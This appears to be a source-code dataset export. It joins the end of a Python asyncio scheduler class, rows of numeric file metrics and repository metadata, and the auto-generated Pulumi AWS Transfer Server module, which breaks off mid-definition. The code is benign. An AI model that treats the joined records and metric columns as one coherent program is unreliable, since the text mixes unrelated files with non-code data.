                # ensure_future schedules it there.
                await asyncio.sleep(delta.total_seconds())
                func()
            except asyncio.CancelledError:
                canceled()
        return asyncio.ensure_future(_trigger(), loop=self._loop)

    def async_trigger(self, coro_func, delta, canceled=lambda: None):
        """Await ``coro_func()`` once after ``delta`` (a ``datetime.timedelta``)."""
        async def _trigger():
            try:
                await asyncio.sleep(delta.total_seconds())
                await coro_func()
            except asyncio.CancelledError:
                canceled()
        return asyncio.ensure_future(_trigger(), loop=self._loop)

    def period(self, func, delta, repeat=None, canceled=lambda: None):
        """Call ``func()`` every ``delta``; ``repeat`` bounds the iterations.

        ``repeat=None`` repeats until the returned task is cancelled.  The
        first call happens immediately; ``delta`` elapses between calls.
        """
        async def _period():
            try:
                # Single loop replaces the original duplicated finite /
                # infinite branches; the condition short-circuits when
                # repeat is None, giving an unbounded loop.
                count = 0
                while repeat is None or count < repeat:
                    func()
                    await asyncio.sleep(delta.total_seconds())
                    count += 1
            except asyncio.CancelledError:
                canceled()
        return asyncio.ensure_future(_period(), loop=self._loop)

    def async_period(self, coro_func, delta, repeat=None, canceled=lambda: None):
        """Await ``coro_func()`` every ``delta``; ``repeat`` bounds the iterations."""
        async def _period():
            try:
                count = 0
                while repeat is None or count < repeat:
                    await coro_func()
                    await asyncio.sleep(delta.total_seconds())
                    count += 1
            except asyncio.CancelledError:
                canceled()
        return asyncio.ensure_future(_period(), loop=self._loop)
| 35.27027
| 83
| 0.50613
| 241
| 2,610
| 5.282158
| 0.149378
| 0.087981
| 0.122545
| 0.103692
| 0.912019
| 0.901807
| 0.901807
| 0.901807
| 0.901807
| 0.901807
| 0
| 0.002594
| 0.409195
| 2,610
| 74
| 84
| 35.27027
| 0.822957
| 0
| 0
| 0.870968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.080645
| false
| 0
| 0.016129
| 0
| 0.209677
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4333ce124e776f754fe985b3d9fdcd7b7e97d42b
| 63,001
|
py
|
Python
|
sdk/python/pulumi_aws/transfer/server.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/transfer/server.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/transfer/server.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ServerArgs', 'Server']
@pulumi.input_type
class ServerArgs:
    # Auto-generated (Pulumi tfgen) argument class for the `Server` resource.
    # Values are stored/read via pulumi.set/pulumi.get so that the
    # @pulumi.input_type decorator can marshal them; do not restructure by
    # hand — regenerate instead (see the file-header warning).
    def __init__(__self__, *,
                 certificate: Optional[pulumi.Input[str]] = None,
                 directory_id: Optional[pulumi.Input[str]] = None,
                 domain: Optional[pulumi.Input[str]] = None,
                 endpoint_details: Optional[pulumi.Input['ServerEndpointDetailsArgs']] = None,
                 endpoint_type: Optional[pulumi.Input[str]] = None,
                 force_destroy: Optional[pulumi.Input[bool]] = None,
                 function: Optional[pulumi.Input[str]] = None,
                 host_key: Optional[pulumi.Input[str]] = None,
                 identity_provider_type: Optional[pulumi.Input[str]] = None,
                 invocation_role: Optional[pulumi.Input[str]] = None,
                 logging_role: Optional[pulumi.Input[str]] = None,
                 protocols: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 security_policy_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 url: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a Server resource.
        :param pulumi.Input[str] certificate: The Amazon Resource Name (ARN) of the AWS Certificate Manager (ACM) certificate. This is required when `protocols` is set to `FTPS`
        :param pulumi.Input[str] directory_id: The directory service ID of the directory service you want to connect to with an `identity_provider_type` of `AWS_DIRECTORY_SERVICE`.
        :param pulumi.Input[str] domain: The domain of the storage system that is used for file transfers. Valid values are: `S3` and `EFS`. The default value is `S3`.
        :param pulumi.Input['ServerEndpointDetailsArgs'] endpoint_details: The virtual private cloud (VPC) endpoint settings that you want to configure for your SFTP server. Fields documented below.
        :param pulumi.Input[str] endpoint_type: The type of endpoint that you want your SFTP server connect to. If you connect to a `VPC` (or `VPC_ENDPOINT`), your SFTP server isn't accessible over the public internet. If you want to connect your SFTP server via public internet, set `PUBLIC`. Defaults to `PUBLIC`.
        :param pulumi.Input[bool] force_destroy: A boolean that indicates all users associated with the server should be deleted so that the Server can be destroyed without error. The default value is `false`. This option only applies to servers configured with a `SERVICE_MANAGED` `identity_provider_type`.
        :param pulumi.Input[str] function: The ARN for a lambda function to use for the Identity provider.
        :param pulumi.Input[str] host_key: RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command).
        :param pulumi.Input[str] identity_provider_type: The mode of authentication enabled for this service. The default value is `SERVICE_MANAGED`, which allows you to store and access SFTP user credentials within the service. `API_GATEWAY` indicates that user authentication requires a call to an API Gateway endpoint URL provided by you to integrate an identity provider of your choice. Using `AWS_DIRECTORY_SERVICE` will allow for authentication against AWS Managed Active Directory or Microsoft Active Directory in your on-premises environment, or in AWS using AD Connectors. Use the `AWS_LAMBDA` value to directly use a Lambda function as your identity provider. If you choose this value, you must specify the ARN for the lambda function in the `function` argument.
        :param pulumi.Input[str] invocation_role: Amazon Resource Name (ARN) of the IAM role used to authenticate the user account with an `identity_provider_type` of `API_GATEWAY`.
        :param pulumi.Input[str] logging_role: Amazon Resource Name (ARN) of an IAM role that allows the service to write your SFTP users’ activity to your Amazon CloudWatch logs for monitoring and auditing purposes.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] protocols: Specifies the file transfer protocol or protocols over which your file transfer protocol client can connect to your server's endpoint. This defaults to `SFTP` . The available protocols are:
               * `SFTP`: File transfer over SSH
               * `FTPS`: File transfer with TLS encryption
               * `FTP`: Unencrypted file transfer
        :param pulumi.Input[str] security_policy_name: Specifies the name of the security policy that is attached to the server. Possible values are `TransferSecurityPolicy-2018-11`, `TransferSecurityPolicy-2020-06`, and `TransferSecurityPolicy-FIPS-2020-06`. Default value is: `TransferSecurityPolicy-2018-11`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
        :param pulumi.Input[str] url: - URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`.
        """
        # Only explicitly-supplied arguments are recorded; a None argument is
        # simply not set, letting the provider/service default apply.
        if certificate is not None:
            pulumi.set(__self__, "certificate", certificate)
        if directory_id is not None:
            pulumi.set(__self__, "directory_id", directory_id)
        if domain is not None:
            pulumi.set(__self__, "domain", domain)
        if endpoint_details is not None:
            pulumi.set(__self__, "endpoint_details", endpoint_details)
        if endpoint_type is not None:
            pulumi.set(__self__, "endpoint_type", endpoint_type)
        if force_destroy is not None:
            pulumi.set(__self__, "force_destroy", force_destroy)
        if function is not None:
            pulumi.set(__self__, "function", function)
        if host_key is not None:
            pulumi.set(__self__, "host_key", host_key)
        if identity_provider_type is not None:
            pulumi.set(__self__, "identity_provider_type", identity_provider_type)
        if invocation_role is not None:
            pulumi.set(__self__, "invocation_role", invocation_role)
        if logging_role is not None:
            pulumi.set(__self__, "logging_role", logging_role)
        if protocols is not None:
            pulumi.set(__self__, "protocols", protocols)
        if security_policy_name is not None:
            pulumi.set(__self__, "security_policy_name", security_policy_name)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if url is not None:
            pulumi.set(__self__, "url", url)

    # Typed property accessors.  @pulumi.getter(name=...) maps the Python
    # snake_case attribute to its camelCase wire name where they differ.
    @property
    @pulumi.getter
    def certificate(self) -> Optional[pulumi.Input[str]]:
        """
        The Amazon Resource Name (ARN) of the AWS Certificate Manager (ACM) certificate. This is required when `protocols` is set to `FTPS`
        """
        return pulumi.get(self, "certificate")

    @certificate.setter
    def certificate(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "certificate", value)

    @property
    @pulumi.getter(name="directoryId")
    def directory_id(self) -> Optional[pulumi.Input[str]]:
        """
        The directory service ID of the directory service you want to connect to with an `identity_provider_type` of `AWS_DIRECTORY_SERVICE`.
        """
        return pulumi.get(self, "directory_id")

    @directory_id.setter
    def directory_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "directory_id", value)

    @property
    @pulumi.getter
    def domain(self) -> Optional[pulumi.Input[str]]:
        """
        The domain of the storage system that is used for file transfers. Valid values are: `S3` and `EFS`. The default value is `S3`.
        """
        return pulumi.get(self, "domain")

    @domain.setter
    def domain(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "domain", value)

    @property
    @pulumi.getter(name="endpointDetails")
    def endpoint_details(self) -> Optional[pulumi.Input['ServerEndpointDetailsArgs']]:
        """
        The virtual private cloud (VPC) endpoint settings that you want to configure for your SFTP server. Fields documented below.
        """
        return pulumi.get(self, "endpoint_details")

    @endpoint_details.setter
    def endpoint_details(self, value: Optional[pulumi.Input['ServerEndpointDetailsArgs']]):
        pulumi.set(self, "endpoint_details", value)

    @property
    @pulumi.getter(name="endpointType")
    def endpoint_type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of endpoint that you want your SFTP server connect to. If you connect to a `VPC` (or `VPC_ENDPOINT`), your SFTP server isn't accessible over the public internet. If you want to connect your SFTP server via public internet, set `PUBLIC`. Defaults to `PUBLIC`.
        """
        return pulumi.get(self, "endpoint_type")

    @endpoint_type.setter
    def endpoint_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "endpoint_type", value)

    @property
    @pulumi.getter(name="forceDestroy")
    def force_destroy(self) -> Optional[pulumi.Input[bool]]:
        """
        A boolean that indicates all users associated with the server should be deleted so that the Server can be destroyed without error. The default value is `false`. This option only applies to servers configured with a `SERVICE_MANAGED` `identity_provider_type`.
        """
        return pulumi.get(self, "force_destroy")

    @force_destroy.setter
    def force_destroy(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "force_destroy", value)

    @property
    @pulumi.getter
    def function(self) -> Optional[pulumi.Input[str]]:
        """
        The ARN for a lambda function to use for the Identity provider.
        """
        return pulumi.get(self, "function")

    @function.setter
    def function(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "function", value)

    @property
    @pulumi.getter(name="hostKey")
    def host_key(self) -> Optional[pulumi.Input[str]]:
        """
        RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command).
        """
        return pulumi.get(self, "host_key")

    @host_key.setter
    def host_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "host_key", value)

    @property
    @pulumi.getter(name="identityProviderType")
    def identity_provider_type(self) -> Optional[pulumi.Input[str]]:
        """
        The mode of authentication enabled for this service. The default value is `SERVICE_MANAGED`, which allows you to store and access SFTP user credentials within the service. `API_GATEWAY` indicates that user authentication requires a call to an API Gateway endpoint URL provided by you to integrate an identity provider of your choice. Using `AWS_DIRECTORY_SERVICE` will allow for authentication against AWS Managed Active Directory or Microsoft Active Directory in your on-premises environment, or in AWS using AD Connectors. Use the `AWS_LAMBDA` value to directly use a Lambda function as your identity provider. If you choose this value, you must specify the ARN for the lambda function in the `function` argument.
        """
        return pulumi.get(self, "identity_provider_type")

    @identity_provider_type.setter
    def identity_provider_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "identity_provider_type", value)

    @property
    @pulumi.getter(name="invocationRole")
    def invocation_role(self) -> Optional[pulumi.Input[str]]:
        """
        Amazon Resource Name (ARN) of the IAM role used to authenticate the user account with an `identity_provider_type` of `API_GATEWAY`.
        """
        return pulumi.get(self, "invocation_role")

    @invocation_role.setter
    def invocation_role(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "invocation_role", value)

    @property
    @pulumi.getter(name="loggingRole")
    def logging_role(self) -> Optional[pulumi.Input[str]]:
        """
        Amazon Resource Name (ARN) of an IAM role that allows the service to write your SFTP users’ activity to your Amazon CloudWatch logs for monitoring and auditing purposes.
        """
        return pulumi.get(self, "logging_role")

    @logging_role.setter
    def logging_role(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "logging_role", value)

    @property
    @pulumi.getter
    def protocols(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Specifies the file transfer protocol or protocols over which your file transfer protocol client can connect to your server's endpoint. This defaults to `SFTP` . The available protocols are:
        * `SFTP`: File transfer over SSH
        * `FTPS`: File transfer with TLS encryption
        * `FTP`: Unencrypted file transfer
        """
        return pulumi.get(self, "protocols")

    @protocols.setter
    def protocols(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "protocols", value)

    @property
    @pulumi.getter(name="securityPolicyName")
    def security_policy_name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the security policy that is attached to the server. Possible values are `TransferSecurityPolicy-2018-11`, `TransferSecurityPolicy-2020-06`, and `TransferSecurityPolicy-FIPS-2020-06`. Default value is: `TransferSecurityPolicy-2018-11`.
        """
        return pulumi.get(self, "security_policy_name")

    @security_policy_name.setter
    def security_policy_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "security_policy_name", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter
    def url(self) -> Optional[pulumi.Input[str]]:
        """
        - URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`.
        """
        return pulumi.get(self, "url")

    @url.setter
    def url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "url", value)
@pulumi.input_type
class _ServerState:
    # Auto-generated (Pulumi tfgen) state class used for `Server.get()` style
    # lookups.  It mirrors ServerArgs but additionally carries the
    # provider-computed outputs `arn`, `endpoint`, `host_key_fingerprint`
    # and `tags_all`.  Values go through pulumi.set/pulumi.get for the
    # @pulumi.input_type decorator; do not restructure by hand.
    def __init__(__self__, *,
                 arn: Optional[pulumi.Input[str]] = None,
                 certificate: Optional[pulumi.Input[str]] = None,
                 directory_id: Optional[pulumi.Input[str]] = None,
                 domain: Optional[pulumi.Input[str]] = None,
                 endpoint: Optional[pulumi.Input[str]] = None,
                 endpoint_details: Optional[pulumi.Input['ServerEndpointDetailsArgs']] = None,
                 endpoint_type: Optional[pulumi.Input[str]] = None,
                 force_destroy: Optional[pulumi.Input[bool]] = None,
                 function: Optional[pulumi.Input[str]] = None,
                 host_key: Optional[pulumi.Input[str]] = None,
                 host_key_fingerprint: Optional[pulumi.Input[str]] = None,
                 identity_provider_type: Optional[pulumi.Input[str]] = None,
                 invocation_role: Optional[pulumi.Input[str]] = None,
                 logging_role: Optional[pulumi.Input[str]] = None,
                 protocols: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 security_policy_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 url: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering Server resources.
        :param pulumi.Input[str] arn: Amazon Resource Name (ARN) of Transfer Server
        :param pulumi.Input[str] certificate: The Amazon Resource Name (ARN) of the AWS Certificate Manager (ACM) certificate. This is required when `protocols` is set to `FTPS`
        :param pulumi.Input[str] directory_id: The directory service ID of the directory service you want to connect to with an `identity_provider_type` of `AWS_DIRECTORY_SERVICE`.
        :param pulumi.Input[str] domain: The domain of the storage system that is used for file transfers. Valid values are: `S3` and `EFS`. The default value is `S3`.
        :param pulumi.Input[str] endpoint: The endpoint of the Transfer Server (e.g., `s-12345678.server.transfer.REGION.amazonaws.com`)
        :param pulumi.Input['ServerEndpointDetailsArgs'] endpoint_details: The virtual private cloud (VPC) endpoint settings that you want to configure for your SFTP server. Fields documented below.
        :param pulumi.Input[str] endpoint_type: The type of endpoint that you want your SFTP server connect to. If you connect to a `VPC` (or `VPC_ENDPOINT`), your SFTP server isn't accessible over the public internet. If you want to connect your SFTP server via public internet, set `PUBLIC`. Defaults to `PUBLIC`.
        :param pulumi.Input[bool] force_destroy: A boolean that indicates all users associated with the server should be deleted so that the Server can be destroyed without error. The default value is `false`. This option only applies to servers configured with a `SERVICE_MANAGED` `identity_provider_type`.
        :param pulumi.Input[str] function: The ARN for a lambda function to use for the Identity provider.
        :param pulumi.Input[str] host_key: RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command).
        :param pulumi.Input[str] host_key_fingerprint: This value contains the message-digest algorithm (MD5) hash of the server's host key. This value is equivalent to the output of the `ssh-keygen -l -E md5 -f my-new-server-key` command.
        :param pulumi.Input[str] identity_provider_type: The mode of authentication enabled for this service. The default value is `SERVICE_MANAGED`, which allows you to store and access SFTP user credentials within the service. `API_GATEWAY` indicates that user authentication requires a call to an API Gateway endpoint URL provided by you to integrate an identity provider of your choice. Using `AWS_DIRECTORY_SERVICE` will allow for authentication against AWS Managed Active Directory or Microsoft Active Directory in your on-premises environment, or in AWS using AD Connectors. Use the `AWS_LAMBDA` value to directly use a Lambda function as your identity provider. If you choose this value, you must specify the ARN for the lambda function in the `function` argument.
        :param pulumi.Input[str] invocation_role: Amazon Resource Name (ARN) of the IAM role used to authenticate the user account with an `identity_provider_type` of `API_GATEWAY`.
        :param pulumi.Input[str] logging_role: Amazon Resource Name (ARN) of an IAM role that allows the service to write your SFTP users’ activity to your Amazon CloudWatch logs for monitoring and auditing purposes.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] protocols: Specifies the file transfer protocol or protocols over which your file transfer protocol client can connect to your server's endpoint. This defaults to `SFTP` . The available protocols are:
               * `SFTP`: File transfer over SSH
               * `FTPS`: File transfer with TLS encryption
               * `FTP`: Unencrypted file transfer
        :param pulumi.Input[str] security_policy_name: Specifies the name of the security policy that is attached to the server. Possible values are `TransferSecurityPolicy-2018-11`, `TransferSecurityPolicy-2020-06`, and `TransferSecurityPolicy-FIPS-2020-06`. Default value is: `TransferSecurityPolicy-2018-11`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
        :param pulumi.Input[str] url: - URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`.
        """
        # Only explicitly-supplied fields are recorded; None means "unknown /
        # not part of this state snapshot".
        if arn is not None:
            pulumi.set(__self__, "arn", arn)
        if certificate is not None:
            pulumi.set(__self__, "certificate", certificate)
        if directory_id is not None:
            pulumi.set(__self__, "directory_id", directory_id)
        if domain is not None:
            pulumi.set(__self__, "domain", domain)
        if endpoint is not None:
            pulumi.set(__self__, "endpoint", endpoint)
        if endpoint_details is not None:
            pulumi.set(__self__, "endpoint_details", endpoint_details)
        if endpoint_type is not None:
            pulumi.set(__self__, "endpoint_type", endpoint_type)
        if force_destroy is not None:
            pulumi.set(__self__, "force_destroy", force_destroy)
        if function is not None:
            pulumi.set(__self__, "function", function)
        if host_key is not None:
            pulumi.set(__self__, "host_key", host_key)
        if host_key_fingerprint is not None:
            pulumi.set(__self__, "host_key_fingerprint", host_key_fingerprint)
        if identity_provider_type is not None:
            pulumi.set(__self__, "identity_provider_type", identity_provider_type)
        if invocation_role is not None:
            pulumi.set(__self__, "invocation_role", invocation_role)
        if logging_role is not None:
            pulumi.set(__self__, "logging_role", logging_role)
        if protocols is not None:
            pulumi.set(__self__, "protocols", protocols)
        if security_policy_name is not None:
            pulumi.set(__self__, "security_policy_name", security_policy_name)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if tags_all is not None:
            pulumi.set(__self__, "tags_all", tags_all)
        if url is not None:
            pulumi.set(__self__, "url", url)

    # Typed property accessors.  @pulumi.getter(name=...) maps the Python
    # snake_case attribute to its camelCase wire name where they differ.
    @property
    @pulumi.getter
    def arn(self) -> Optional[pulumi.Input[str]]:
        """
        Amazon Resource Name (ARN) of Transfer Server
        """
        return pulumi.get(self, "arn")

    @arn.setter
    def arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "arn", value)

    @property
    @pulumi.getter
    def certificate(self) -> Optional[pulumi.Input[str]]:
        """
        The Amazon Resource Name (ARN) of the AWS Certificate Manager (ACM) certificate. This is required when `protocols` is set to `FTPS`
        """
        return pulumi.get(self, "certificate")

    @certificate.setter
    def certificate(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "certificate", value)

    @property
    @pulumi.getter(name="directoryId")
    def directory_id(self) -> Optional[pulumi.Input[str]]:
        """
        The directory service ID of the directory service you want to connect to with an `identity_provider_type` of `AWS_DIRECTORY_SERVICE`.
        """
        return pulumi.get(self, "directory_id")

    @directory_id.setter
    def directory_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "directory_id", value)

    @property
    @pulumi.getter
    def domain(self) -> Optional[pulumi.Input[str]]:
        """
        The domain of the storage system that is used for file transfers. Valid values are: `S3` and `EFS`. The default value is `S3`.
        """
        return pulumi.get(self, "domain")

    @domain.setter
    def domain(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "domain", value)

    @property
    @pulumi.getter
    def endpoint(self) -> Optional[pulumi.Input[str]]:
        """
        The endpoint of the Transfer Server (e.g., `s-12345678.server.transfer.REGION.amazonaws.com`)
        """
        return pulumi.get(self, "endpoint")

    @endpoint.setter
    def endpoint(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "endpoint", value)

    @property
    @pulumi.getter(name="endpointDetails")
    def endpoint_details(self) -> Optional[pulumi.Input['ServerEndpointDetailsArgs']]:
        """
        The virtual private cloud (VPC) endpoint settings that you want to configure for your SFTP server. Fields documented below.
        """
        return pulumi.get(self, "endpoint_details")

    @endpoint_details.setter
    def endpoint_details(self, value: Optional[pulumi.Input['ServerEndpointDetailsArgs']]):
        pulumi.set(self, "endpoint_details", value)

    @property
    @pulumi.getter(name="endpointType")
    def endpoint_type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of endpoint that you want your SFTP server connect to. If you connect to a `VPC` (or `VPC_ENDPOINT`), your SFTP server isn't accessible over the public internet. If you want to connect your SFTP server via public internet, set `PUBLIC`. Defaults to `PUBLIC`.
        """
        return pulumi.get(self, "endpoint_type")

    @endpoint_type.setter
    def endpoint_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "endpoint_type", value)

    @property
    @pulumi.getter(name="forceDestroy")
    def force_destroy(self) -> Optional[pulumi.Input[bool]]:
        """
        A boolean that indicates all users associated with the server should be deleted so that the Server can be destroyed without error. The default value is `false`. This option only applies to servers configured with a `SERVICE_MANAGED` `identity_provider_type`.
        """
        return pulumi.get(self, "force_destroy")

    @force_destroy.setter
    def force_destroy(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "force_destroy", value)

    @property
    @pulumi.getter
    def function(self) -> Optional[pulumi.Input[str]]:
        """
        The ARN for a lambda function to use for the Identity provider.
        """
        return pulumi.get(self, "function")

    @function.setter
    def function(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "function", value)

    @property
    @pulumi.getter(name="hostKey")
    def host_key(self) -> Optional[pulumi.Input[str]]:
        """
        RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command).
        """
        return pulumi.get(self, "host_key")

    @host_key.setter
    def host_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "host_key", value)

    @property
    @pulumi.getter(name="hostKeyFingerprint")
    def host_key_fingerprint(self) -> Optional[pulumi.Input[str]]:
        """
        This value contains the message-digest algorithm (MD5) hash of the server's host key. This value is equivalent to the output of the `ssh-keygen -l -E md5 -f my-new-server-key` command.
        """
        return pulumi.get(self, "host_key_fingerprint")

    @host_key_fingerprint.setter
    def host_key_fingerprint(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "host_key_fingerprint", value)

    @property
    @pulumi.getter(name="identityProviderType")
    def identity_provider_type(self) -> Optional[pulumi.Input[str]]:
        """
        The mode of authentication enabled for this service. The default value is `SERVICE_MANAGED`, which allows you to store and access SFTP user credentials within the service. `API_GATEWAY` indicates that user authentication requires a call to an API Gateway endpoint URL provided by you to integrate an identity provider of your choice. Using `AWS_DIRECTORY_SERVICE` will allow for authentication against AWS Managed Active Directory or Microsoft Active Directory in your on-premises environment, or in AWS using AD Connectors. Use the `AWS_LAMBDA` value to directly use a Lambda function as your identity provider. If you choose this value, you must specify the ARN for the lambda function in the `function` argument.
        """
        return pulumi.get(self, "identity_provider_type")

    @identity_provider_type.setter
    def identity_provider_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "identity_provider_type", value)

    @property
    @pulumi.getter(name="invocationRole")
    def invocation_role(self) -> Optional[pulumi.Input[str]]:
        """
        Amazon Resource Name (ARN) of the IAM role used to authenticate the user account with an `identity_provider_type` of `API_GATEWAY`.
        """
        return pulumi.get(self, "invocation_role")

    @invocation_role.setter
    def invocation_role(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "invocation_role", value)

    @property
    @pulumi.getter(name="loggingRole")
    def logging_role(self) -> Optional[pulumi.Input[str]]:
        """
        Amazon Resource Name (ARN) of an IAM role that allows the service to write your SFTP users’ activity to your Amazon CloudWatch logs for monitoring and auditing purposes.
        """
        return pulumi.get(self, "logging_role")

    @logging_role.setter
    def logging_role(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "logging_role", value)

    @property
    @pulumi.getter
    def protocols(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Specifies the file transfer protocol or protocols over which your file transfer protocol client can connect to your server's endpoint. This defaults to `SFTP` . The available protocols are:
        * `SFTP`: File transfer over SSH
        * `FTPS`: File transfer with TLS encryption
        * `FTP`: Unencrypted file transfer
        """
        return pulumi.get(self, "protocols")

    @protocols.setter
    def protocols(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "protocols", value)

    @property
    @pulumi.getter(name="securityPolicyName")
    def security_policy_name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the security policy that is attached to the server. Possible values are `TransferSecurityPolicy-2018-11`, `TransferSecurityPolicy-2020-06`, and `TransferSecurityPolicy-FIPS-2020-06`. Default value is: `TransferSecurityPolicy-2018-11`.
        """
        return pulumi.get(self, "security_policy_name")

    @security_policy_name.setter
    def security_policy_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "security_policy_name", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="tagsAll")
    def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
        """
        return pulumi.get(self, "tags_all")

    @tags_all.setter
    def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags_all", value)

    @property
    @pulumi.getter
    def url(self) -> Optional[pulumi.Input[str]]:
        """
        - URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`.
        """
        return pulumi.get(self, "url")

    @url.setter
    def url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "url", value)
class Server(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
certificate: Optional[pulumi.Input[str]] = None,
directory_id: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
endpoint_details: Optional[pulumi.Input[pulumi.InputType['ServerEndpointDetailsArgs']]] = None,
endpoint_type: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
function: Optional[pulumi.Input[str]] = None,
host_key: Optional[pulumi.Input[str]] = None,
identity_provider_type: Optional[pulumi.Input[str]] = None,
invocation_role: Optional[pulumi.Input[str]] = None,
logging_role: Optional[pulumi.Input[str]] = None,
protocols: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
security_policy_name: Optional[pulumi.Input[str]] = None,
